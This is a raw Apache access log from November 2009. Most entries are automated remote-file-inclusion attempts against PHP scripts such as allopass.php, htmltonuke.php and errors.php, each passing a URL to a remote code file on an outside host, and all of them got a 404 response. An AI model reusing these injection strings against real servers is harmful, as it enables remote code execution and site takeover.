70.38.112.174 - - [11/Nov/2009:21:21:34 -0600] "GET /logs/access_log.1242172800//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:21:21:34 -0600] "GET /logs/access_log.1254182400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:38 -0600] "GET /logs/access_log.1247788800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:38 -0600] "GET /logs/access_log.1248912000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:21:21:39 -0600] "GET /htmltonuke.php?filnavn=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:21:21:39 -0600] "GET /logs/access_log.1252800000/htmltonuke.php?filnavn=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:21:21:39 -0600] "GET /logs/htmltonuke.php?filnavn=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:39 -0600] "GET /logs/access_log.1250899200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:39 -0600] "GET /logs/access_log.1248998400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:39 -0600] "GET /logs/access_log.1251676800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:39 -0600] "GET /logs/access_log.1247529600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:39 -0600] "GET /logs/access_log.1249084800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:39 -0600] "GET /logs/access_log.1252713600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:49 -0600] "GET /logs/access_log.1251849600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:49 -0600] "GET /logs/access_log.1252022400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:49 -0600] "GET /logs/access_log.1244592000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:49 -0600] "GET /logs/access_log.1243641600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:50 -0600] "GET /logs/access_log.1250899200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:50 -0600] "GET /logs/access_log.1248998400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:50 -0600] "GET /logs/access_log.1249084800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:50 -0600] "GET /logs/access_log.1251676800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:50 -0600] "GET /logs/access_log.1247529600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:50 -0600] "GET /logs/access_log.1252713600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:21:58 -0600] "GET /logs/access_log.1246752000//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:21:58 -0600] "GET /logs/access_log.1248480000//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:58 -0600] "GET /logs/access_log.1250121600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:58 -0600] "GET /logs/access_log.1245628800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:21:58 -0600] "GET /logs/access_log.1250467200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:00 -0600] "GET /logs/access_log.1251849600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:00 -0600] "GET /logs/access_log.1252022400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:00 -0600] "GET /logs/access_log.1243641600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:00 -0600] "GET /logs/access_log.1244592000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:04 -0600] "GET /logs/access_log.1248912000//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:07 -0600] "GET /logs/access_log.1242691200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:07 -0600] "GET /logs/access_log.1247961600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:07 -0600] "GET /logs/access_log.1245888000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:10 -0600] "GET /logs/access_log.1250121600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:10 -0600] "GET /logs/access_log.1245628800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:10 -0600] "GET /logs/access_log.1250467200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:11 -0600] "GET /logs/access_log.1251763200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:11 -0600] "GET /logs/access_log.1246838400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:12 -0600] "GET /logs/access_log.1246233600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:12 -0600] "GET /logs/access_log.1250812800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:12 -0600] "GET /logs/access_log.1247097600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:12 -0600] "GET /logs/access_log.1246147200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:12 -0600] "GET /logs/access_log.1250208000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:12 -0600] "GET /logs/access_log.1250553600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:21:22:13 -0600] "GET /logs/access_log.1250380800/htmltonuke.php?filnavn=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:16 -0600] "GET /logs/access_log.1244851200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:16 -0600] "GET /logs/access_log.1245110400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:16 -0600] "GET /logs/access_log.1252368000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:16 -0600] "GET /logs/access_log.1243900800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:16 -0600] "GET /logs/access_log.1245369600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:16 -0600] "GET /logs/access_log.1252281600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:16 -0600] "GET /logs/access_log.1245024000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:16 -0600] "GET /logs/access_log.1240358400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:16 -0600] "GET /logs/access_log.1242432000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:16 -0600] "GET /logs/access_log.1245801600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:19 -0600] "GET /logs/access_log.1242691200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:19 -0600] "GET /logs/access_log.1247961600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:19 -0600] "GET /logs/access_log.1245888000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:23 -0600] "GET /logs/access_log.1251763200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:23 -0600] "GET /logs/access_log.1246838400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:23 -0600] "GET /logs/access_log.1246233600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:23 -0600] "GET /logs/access_log.1250812800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:23 -0600] "GET /logs/access_log.1247097600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:23 -0600] "GET /logs/access_log.1246147200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:23 -0600] "GET /logs/access_log.1250553600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:26 -0600] "GET /logs/access_log.1250208000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.85.82.200 - - [11/Nov/2009:21:22:26 -0600] "GET /logs//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.85.82.200 - - [11/Nov/2009:21:22:26 -0600] "GET //allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
88.85.82.200 - - [11/Nov/2009:21:22:26 -0600] "GET /logs/access_log.1249084800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.85.82.200 - - [11/Nov/2009:21:22:26 -0600] "GET /logs/access_log.1246838400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1250294400//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1244937600//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1250899200//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1247529600//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1249084800//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1251676800//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1244851200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1245110400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1252368000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1243900800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1245369600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1252281600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1245024000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1240358400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1242432000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:27 -0600] "GET /logs/access_log.1245801600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:28 -0600] "GET /logs/access_log.1253232000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:28 -0600] "GET /logs/access_log.1242777600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:28 -0600] "GET /logs/access_log.1252454400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:28 -0600] "GET /logs/access_log.1252195200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:28 -0600] "GET /logs/access_log.1242604800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:28 -0600] "GET /logs/access_log.1252627200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:28 -0600] "GET /logs/access_log.1251417600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:32 -0600] "GET /logs/access_log.1241827200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:32 -0600] "GET /logs/access_log.1246665600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:32 -0600] "GET /logs/access_log.1242345600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:32 -0600] "GET /logs/access_log.1248393600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:32 -0600] "GET /logs/access_log.1254441600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:32 -0600] "GET /logs/access_log.1254096000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:32 -0600] "GET /logs/access_log.1254182400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.85.82.200 - - [11/Nov/2009:21:22:36 -0600] "GET //allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
88.85.82.200 - - [11/Nov/2009:21:22:36 -0600] "GET /logs//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.85.82.200 - - [11/Nov/2009:21:22:36 -0600] "GET /logs/access_log.1249084800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.85.82.200 - - [11/Nov/2009:21:22:36 -0600] "GET /logs/access_log.1246838400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:37 -0600] "GET /logs/access_log.1252713600//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:37 -0600] "GET /logs/access_log.1251849600//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:37 -0600] "GET /logs/access_log.1252022400//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:39 -0600] "GET /logs/access_log.1253232000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:39 -0600] "GET /logs/access_log.1252454400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:39 -0600] "GET /logs/access_log.1242777600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:39 -0600] "GET /logs/access_log.1252195200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:39 -0600] "GET /logs/access_log.1242604800//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:39 -0600] "GET /logs/access_log.1252627200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:39 -0600] "GET /logs/access_log.1251417600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:43 -0600] "GET /logs/access_log.1241827200//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:43 -0600] "GET /logs/access_log.1246665600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:43 -0600] "GET /logs/access_log.1242345600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:43 -0600] "GET /logs/access_log.1248393600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:43 -0600] "GET /logs/access_log.1254441600//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:43 -0600] "GET /logs/access_log.1254096000//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.142.120.148 - - [11/Nov/2009:21:22:43 -0600] "GET /logs/access_log.1254182400//allopass.php?mosConfig_live_site=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:54 -0600] "GET /logs/access_log.1243641600//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:54 -0600] "GET /logs/access_log.1250121600//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:54 -0600] "GET /logs/access_log.1245628800//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.112.174 - - [11/Nov/2009:21:22:54 -0600] "GET /logs/access_log.1250467200//allopass.php?mosConfig_live_site=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.213.177.58 - - [11/Nov/2009:21:22:54 -0600] "GET /logs/errors.php?error=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
